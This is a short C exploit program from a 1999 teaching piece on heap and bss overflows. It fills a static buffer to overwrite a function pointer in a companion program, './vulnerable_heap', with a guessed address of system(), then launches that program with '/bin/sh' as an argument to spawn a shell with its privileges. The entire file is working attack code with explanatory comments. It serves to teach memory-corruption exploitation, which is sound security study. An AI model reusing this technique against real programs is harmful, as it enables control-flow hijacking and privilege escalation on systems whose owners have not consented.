    /*
    * Copyright (C) January 1999, Matt Conover & WSD
    * (minor changes by David Mouritsen)
    * Demonstrates overflowing/manipulating static function pointers in
    * the bss (uninitialized data) to execute functions.
    *
    * Try in the offset (argv[2]) in the range of 0-20 
    * To compile use: gcc -o exploit_heap exploit_heap.c
    */

   #include <stdio.h>
   #include <stdlib.h>
   #include <unistd.h>
   #include <string.h>

   #define BUFSIZE 64 /* the estimated diff between funcptr and buf (the buffer in heap we are oveflowing) */
 
   #define ERROR -1

   int main(int argc, char **argv)
   {
      register int i;
      u_long sysaddr;
      static char buf[BUFSIZE + sizeof(u_long) + 1] = {0};

      if (argc <= 1) {
         fprintf(stderr, "Usage: %s <offset>\n", argv[0]);
         fprintf(stderr, "[offset = estimated system() offset]\n\n");

         exit(ERROR);
      }

      sysaddr = (u_long)&system - atoi(argv[1]); /* this is our guess for the address of system */
      printf("Trying system() at 0x%lx\n\n", sysaddr);

      memset(buf, 'A', BUFSIZE);

      /* reverse byte order (on a little endian system) (ntohl equiv) */
      for (i = 0; i < sizeof(sysaddr); i++) /* here we put our guess of system address in the perfect spot in buf to overflow funcptr */
         buf[BUFSIZE + i] = ((u_long)sysaddr >> (i * 8)) & 255; 

      /* 
      This executes the vulnerable program with argv[1]=buf and argv[2]="/bin/sh" 
      if we are good--we will get the vulnerable program to execute this command: system("/bin/sh")
      which would give us a shell with the same permissions as the vulnerable program 
      */
      execl("./vulnerable_heap", "./vulnerable_heap", buf, "/bin/sh", NULL);
      return 0;
   }
